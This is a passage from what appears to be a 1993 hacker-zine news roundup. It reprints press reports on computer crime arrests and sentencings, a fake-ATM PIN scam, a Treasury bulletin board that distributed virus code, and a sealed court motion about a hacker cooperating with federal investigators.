The crime was the first case of bank embezzlement via computer in China. Authorities became aware of the plot when Shi and his alleged accomplice, Yu Lixin, tried to wire part of the money to Shenzhen in southern China.
-----------------------------------------------------------------------------

Teen Takes the A Train --- Literally                           May 13, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From AP Newswire sources)

A 16 year old 10th grader successfully conveyed passengers on a NYC 10 car subway train for 2.5 hours until he went around a curve too quickly and could not reset the emergency brakes.

Keron Thomas, dressed as a NY subway train engineer, impersonated Regoberto Sabio, a REAL subway motorman, while he was on vacation and even obtained Sabio's "pass number". Thomas was a Subway enthusiast who hung around train stations and areas where subway motormen and other subway workers hang out.

A NYC subway spokesman was quoted as saying "Buffs like to watch...pretty soon they figure out how" [to run the train]. "This guy really knew what he was doing".

Thomas was charged with criminal trespassing, criminal impersonation, and reckless endangerment.

-----------------------------------------------------------------------------

Banks React To Scheme That Used Phony ATM                      May 13, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From AP Newswire Sources)

At least three people are believed to be involved in an ATM scam that is thought to have netted roughly $60,000.

The fraud was perpetrated by obtaining a real ATM machine (theorized to have been stolen from a warehouse) and placing it in a Connecticut shopping mall. When people attempted to use the machine, they received a message that the machine wasn't working correctly and gave back the card. Little did they know that their bank account number and PIN code were recorded. The fake machine was in place for about 2 weeks. It was removed and the thieves began making withdrawals.
The Secret Service thinks the scammers recorded anywhere from 2000 to 3000 account numbers/pin codes but did not get a chance to counterfeit and withdraw money except from a few hundred accounts before it became too dangerous to continue.

-----------------------------------------------------------------------------

Hacker Gets Jail Time                                          June 5, 1993
~~~~~~~~~~~~~~~~~~~~~
(Newsday) (Page 13)

A Brooklyn College film student, who was part of a group that allegedly broke into computer systems operated by major telephone companies, was sentenced yesterday to 1 year and 1 day in prison.

John Lee, 21, of Bedford Stuyvesant, also was sentenced to 200 hours of community service, which Manhattan Federal District Court Judge Richard Owen recommended he spend teaching others to use computers.

Lee had pled guilty December 3, 1992, to a conspiracy charge involving computer tampering, fraud and illegal wiretapping.

_______________________________________________________________________________

Hacker Gets Prison Term For Phone Computer Tampering           June 4, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Gail Appleson (The Reuter Business Report)

NEW YORK -- A computer hacker known as "Corrupt" who was part of a group that broke into computer systems operated by major telephone companies was sentenced Friday to one year and one day in prison.

The defendant, John Lee, 21, of New York had pleaded guilty December 3, 1992 to a conspiracy charge involving computer tampering, fraud and illegal wiretapping.

The indictment alleges the defendants broke into computer switching systems operated by Southwestern Bell, New York Telephone, Pacific Bell, U.S. West and Martin Marietta Electronics Information and Missile Group.

Southwestern Bell allegedly lost $370,000 because of the crimes.

The defendants also allegedly tampered with systems owned by the nation's largest credit reporting companies including TRW, Trans Union and Information America.
They allegedly obtained 176 TRW credit reports on various individuals.

The indictment alleged the group broke into the computers "to enhance their image and prestige among other computer hackers and to harass and intimidate rival hackers and other people they did not like."

_______________________________________________________________________________

Professional Computer Hackers First To Land In Jail Under New Law   June 4, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Nicholas Hills (The Vancouver Sunds)(Page A11)

LONDON -- In Brussels, they were celebrated as the two young men who broke the gaudy secrets of EC president Jacques Delors' expense accounts.

In Sweden, they were known as the Eight-Legged Groove Machine, bringing down part of the country's telephone network, forcing a highly publicized apology from a government minister who said the chaos was all due to a 'technical fault'.

They also broke into various European defense ministry networks, academic systems at Hull University and the financial records of the leading London bankers, S.G. Warburg.

No, these weren't two happy-go-lucky burglars; but rather, professional computer hackers, aged 24 and 22, who made legal as well as technological history by being the first offenders of this new trade to be jailed for their crimes under new British law.

Neil Woods and Karl Strickland have gone to prison for six months each for penetrating computer systems in 15 different countries. The ease with which they conducted this exercise, and their attitude that they were simply engaging in "intellectual joyriding," has confirmed the worst fears of legal and technological experts that computer hacking in Europe, at least, has become a virtually uncontrollable virus.
The case became a cause celebre because of what had happened months before in another courtroom where a teenage computer addict who had hacked into the White House system, the EC, and even the Tokyo Zoo -- using a $400 birthday present from his mother -- had walked free because a jury accepted, basically, that a computer had taken over his mind. The case of 19-year-old Paul Bedworth, who began hacking at the age of 14, and is now studying "artificial intelligence" at Edinburgh University, provides an insight into why hackers have turned the new computer world into an equivalent state of delirium tremens. Bedworth and two young friends caused thousands of dollars worth of damage to computer systems in Britain and abroad. They were charged with criminal conspiracy under the Computer Misuse Act of 1990. Bedworth never did deny computer hacking at his trial, and did not give evidence in his defense. He simply said through his lawyer that there could not have been any criminal intent because of his "pathological obsession" with computers. A jury of eight men and three women unanimously acquitted him. Until the passage of the Computer Misuse Act in 1990, hacking was legal in Britain. Bedworth may have been found not guilty, but his activities were so widespread that the authorities' investigation involved eight different British police forces, and others from as far afield as Finland and Singapore. It produced so much evidence - mostly on disk - that if it had been printed out on ordinary laser printer paper, it is estimated that the material would have reached a height of 42 meters. The police were devastated by the verdict, but are now feeling somewhat better after the conviction of Woods and Strickland. The pair, using the nicknames of Pad and Gandalf, would spend up to six hours a day at their computers, boasting about "smashing" databases. 
-----------------------------------------------------------------------------

Computers Turned My Boy Into A Robot                           March 18, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Martin Phillips (Daily Mirror)(Page 1)

Connie Bedworth said she was powerless to control the "monster" as he glued himself to the screen nearly 24 hours a day.

"He didn't want to eat or sleep--he just couldn't bear to be away from it," she said.

A jury decided Paul Bedworth, now 19, was so "hooked" he could not stop himself hacking in to companies' systems -- allegedly costing them thousands of dollars.

-----------------------------------------------------------------------------

Hot For The Fingertips: An Internet Meeting Of Minds           May 23, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Frank Bajak (Associated Press)

NEW YORK -- Somewhere in the ether and silicon that unite two workstations 11 floors above lower Broadway, denizens of the cyberpunk milieu are feverishly debating whether anyone in government can be trusted.

This is the 12-by-20-foot bare-walled home of MindVox, today's recreation hall for the new lost generation's telecomputing crowd. You can enter by phone line or directly off Internet.

Patrick Kroupa and Bruce Fancher are the proprietors, self-described former Legion of Doom telephone hackers who cut the cord with computing for a time after mid-1980s teen-age shenanigans.

Kroupa is a towering 25-year-old high school dropout in a black leather jacket, with long hair gathered under a gray bandanna, three earrings and a hearty laugh.

Fancher is 22 and more businesslike, but equally in love with this dream he left Tufts University for.

They've invested more than $80,000 into Mindvox, which went fully operational in November and has more than 2,000 users, who pay $15 to $20 a month plus telephone charges.
MindVox aspires to be a younger, harder-edged alternative to the WELL, a fertile 8-year-old watering hole for the mind in Sausalito, California, with more than 7,000 users, including scores of computer age luminaries.

One popular feature is a round-table discussion on computer theft and security hosted by a U.S. Treasury agent. The latest hot topic is the ease of breaking into a new flavor of local access network.

-----------------------------------------------------------------------------

Hi Girlz, See You In Cyberspace                                May 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Margie (Sassy Magazine) (Page 79)

[Margie hits the net via Mindvox. Along the way she discovers flame wars, sexism, and a noted lack of females online. This is her story. :) ]

-----------------------------------------------------------------------------

Hacker Accused of Rigging Radio Contests                       April 22, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Don Clark (San Francisco Chronicle)

A notorious hacker was charged yesterday with using computers to rig promotional contests at three Los Angeles radio stations, in a scheme that allegedly netted two Porsches, $20,000 in cash and at least two trips to Hawaii.

Kevin Lee Poulsen, now awaiting trial on earlier federal charges, is accused of conspiring with two other hackers to seize control of incoming phone lines at the radio stations. By making sure that only their calls got through, the conspirators were assured of winning the contests, federal prosecutors said.

A new 19-count federal indictment filed in Los Angeles charges that Poulsen also set up his own wire taps and hacked into computers owned by California Department of Motor Vehicles and Pacific Bell. Through the latter, he obtained information about the undercover businesses and wiretaps run by the FBI, the indictment states.

Poulsen, 27, is accused of committing the crimes during 17 months on the lam from earlier charges of telecommunications and computer fraud filed in San Jose.
He was arrested in April 1991 and is now in the federal Correctional Institution in Dublin. In December, prosecutors added an espionage charge against him for his alleged theft of a classified military document.

The indictment announced yesterday adds additional charges of computer and mail fraud, money laundering, interception of wire communications and obstruction of justice.

Ronald Mark Austin and Justin Tanner Peterson have pleaded guilty to conspiracy and violating computer crime laws and have agreed to help against Poulsen. Both are Los Angeles residents.

Poulsen and Austin have made headlines together before. As teenagers in Los Angeles, the two computer prodigies allegedly broke into a Pentagon-organized computer network that links researchers and defense contractors around the country.

-----------------------------------------------------------------------------

SPA Tracks Software Pirates on Internet                        March 22, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Shawn Willett (InfoWorld)(Page 12)

The Software Publishers Association has begun investigating reports of widespread piracy on the Internet, a loose amalgam of thousands of computer networks.

The Internet, which began as a Unix-oriented, university-based communications network, now reaches into corporate and government sites in 110 countries and is growing at a rapid pace.

The software theft, according to Andrew Patrizio, an editor at the _Software Industry Bulletin_, has been found on certain channels, particularly the warez channel.

"People are openly talking about pirating software; there seems to be no one there to monitor it", Patrizio said.

A major problem with the Internet is that the "sites" from where the software is being illegally downloaded can physically be located in countries that do not have strong antipiracy laws, such as Italy or the former Soviet Union. The Internet also has no central administrator or system operator.

"Policing the entire Internet would be a job", said Peter Beruk, litigation manager for the SPA, in Washington. "My feeling would be to target specific sections that are offering a lot of commercial software free for the download", he said.

---------------------------------------------------------------------------

Socialite's Son Will Have To Pay $15,000 To Get His Impounded 1991 BMW Back
                                                               March 23, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By John Makeig (Houston Chronicle)(Page 14A)

Kenyon Shulman, son of Houston socialite Carolyn Farb, will have to pay 15 thousand dollars to get back his 1991 BMW 325i after being impounded when Houston police found 400 doses of the drug ecstasy in its trunk.

This is just the latest brush with authorities for Shulman who in 1988 was raided by Harris County authorities for using his personal computer to crack AT&T codes to make free long distance calls.

--------------------------------------------------------------------------

Austin Man Gets 10 Years For Computer Theft, Sales             May 6, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Jim Phillips (Austin American Statesman)(Page B3)

Jason Copson, who was arrested in July under his alias Scott Edward Berry, has been sentenced to 10 years on each of four charges of burglary and one count of assault. The charges will run concurrently.

Copson still faces charges in Maryland and Virginia where he served a prison term and was serving probation for dealing in stolen goods.

Police arrested Copson and Christopher Lamprecht on July 9 during a sting in which the men tried to sell computer chips stolen from Advanced Micro Devices.

---------------------------------------------------------------------------

Treasury Told Computer Virus Secrets                           June 19, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By: Joel Garreau (Washington Post) (Page A01)

For more than a year, computer virus programs that can wreak havoc with computer systems throughout the world were made available by a U.S.
government agency to anyone with a home computer and a modem, officials acknowledged this week.

At least 1,000 computer users called a Treasury Department telephone number, spokesmen said, and had access to the virus codes by tapping into the department's Automated Information System bulletin board before it was muzzled last month.

The bulletin board, run by a security branch of the Bureau of Public Debt in Parkersburg, W.Va., is aimed at professionals whose job it is to combat such malicious destroyers of computer files as "The Internet Worm," "Satan's Little Helper" and "Dark Avenger's Mutation Engine." But nothing blocked anyone else from gaining access to the information.

Before the practice was challenged by anonymous whistleblowers, the bulletin board offered "recompilable disassembled virus source code" -- that is, programs manipulated to reveal their inner workings. The board also made available hundreds of "hackers' tools" -- the cybernetic equivalent of safecracking aids. They included "password cracker" software -- various programs that generate huge volumes of letters and numbers until they find the combination that a computer is programmed to recognize as authorizing access to its contents -- and "war dialers," which call a vast array of telephone numbers and record those hooked to a computer.

The information was intended to educate computer security personnel, according to Treasury spokesmen. "Until you understand how penetration is done, you can't secure your system," said Kim Clancy, the bulletin board's operator.

The explosion of computer bulletin boards -- dial-up systems that allow users to trade any product that can be expressed in machine-readable zeros and ones -- has also added to the ease of virus transmission, computer analysts say.

"I am Bulgarian and my country is known as the home of many productive virus writers, but at least our government has never officially distributed viruses," wrote Vesselin Vladimirov Bontchev of the Virus Test Center of the University of Hamburg, Germany.

At first, the AIS bulletin board contained only routine security alert postings. But then operator Clancy "began to get underground hacker files and post them on her board," said Bruce Sterling, author of "The Hacker Crackdown: Law and Disorder on the Electronic Frontier." "She amassed a truly impressive collection of underground stuff. If you don't read it, you don't know what's going to hit you."

Clancy, 30, who is a former Air Force bomb-squad member, is highly regarded in the computer security world. Sterling, one of the nation's foremost writers about the computer underground, called her "probably the best there is in the federal government who's not military or NSA (National Security Agency). Probably better than most CIA."

Clancy, meanwhile, is staying in touch with the underground. In fact, this week, she said, she was "testing a product for some hackers." Before it goes into production, she will review it to find potential bugs. It is a new war dialer called "Tone-Loc." "It's an extremely good tool. Saves me a lot of trouble. It enables me to run a hack against my own phone system faster" to determine points of vulnerability.

-----------------------------------------------------------------------------

[AGENT STEAL -- WORKING WITH THE FEDS]

                     IN THE UNITED STATES DISTRICT COURT
                     FOR THE NORTHERN DISTRICT OF TEXAS
                               DALLAS DIVISION
                     -----------------------------------

THE UNITED STATES OF AMERICA   *
                               *
V.                             *      CRIMINAL NO. 3-91-194-T
                               *      (FILED UNDER SEAL)
JUSTIN TANNER PETERSEN (1)     *

                            JOINT MOTION TO SEAL

COMES NOW the United States of America, by its United States Attorney, at the request of the defendant, and hereby requests that this Honorable Court seal the record in this case.
In support thereof, the United States states the following:

1. The case is currently being transferred to the Middle District of California for plea and disposition pursuant to Federal Rule of Criminal Procedure 20;

2. The defendant is released on bond by the United States District Court for the Middle District of California;

3. The defendant, acting in an undercover capacity, currently is cooperating with the United States in the investigation of other persons in California; and

4. The United States believes that the disclosure of the file in this case could jeopardize the aforesaid investigation and possibly the life of the defendant.

Consequently, the United States requests that this Honorable Court seal the record in this case.

Respectfully submitted,

MARVIN COLLINS
United States Attorney

LEONARD A. SENEROTE
Assistant United States Attorney
Texas State Bar No. 18024700
1100 Commerce Street, Room 16G28
Dallas, Texas 75242-1699
(214) 767-0951

CERTIFICATE OF CONFERENCE

The defendant joins in this motion.

LEONARD A. SENEROTE
Assistant United States Attorney

[The entire file of information gathered from the courts regarding Agent Steal is available from Phrack for $5.00 + $2 postage]

-------------------------------------------------------------------------